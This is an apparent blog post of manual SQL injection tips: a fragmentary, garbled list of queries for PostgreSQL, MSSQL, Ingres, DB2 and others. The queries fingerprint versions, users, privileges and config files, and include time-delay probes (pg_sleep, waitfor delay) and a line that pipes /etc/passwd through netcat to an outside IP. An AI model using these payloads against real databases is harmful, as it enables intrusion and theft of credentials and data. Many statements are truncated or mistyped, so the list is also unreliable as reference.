SELECT cast(’123' as integer) FROM sysibm.sysdummy1;
select version();
select current_database();
"select current_user;
select session_user;
"SELECT current_setting('data_directory');
select current_setting(’log_connections’);
select current_setting(’log_statement’);
"select current_setting(’port’);
select current_setting(’password_encryption’);
select current_setting(’krb_server_keyfile’);
"select current_setting(’virtual_host’);
select current_setting(’port’);
"select current_setting(’config_file’);
"select current_setting(’hba_file’);
"select current_setting(’data_directory’);
LIMIT n
SELECT pg_sleep(10);
SELECT current_database()
SELECT relname
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('r'
SELECT DISTINCT relname FROM pg_class C
SELECT 1; --comment
SELECT /*comment*/1;
SELECT chr(65);
SELECT ascii('A');
SELECT CHR(65)||CHR(66);
SELECT usename
SELECT usename FROM pg_user WHERE usesuper IS TRUE
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080');
SELECT 'A' || 'B';
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);
SELECT * FROM dblink('host=put.your.hostname.here user=someuser dbname=somedb'
select dbmsinfo(’_version’);
select dbmsinfo(’session_user’);
select dbmsinfo(’system_user’);
select dbmsinfo(’database’);
select dbmsinfo(’db_admin’);
select dbmsinfo(’create_table’);
select dbmsinfo(’create_procedure’);
select dbmsinfo(’security_priv’);
select dbmsinfo(’select_syscat’);
select dbmsinfo(’db_privileges’);
select dbmsinfo(’current_priv_mask’);
select top 10 blah from table;
select first 10 blah form table;
select table_name
select relid
select relid
select column_name
select 1 union select 2;
select cast(’123' as integer);
select @@version"
select name from master..syslogins"
select name from master..sysdatabases"
convert(integer
waitfor delay '0:0:5'
Database Version lower than 5 i.e Version 4 cannot accept UNION version 5 type queries.
Manual SQL Injection Trick And Tip
Reviewed by Anonymous
on
December 25, 2015
Rating:
No comments: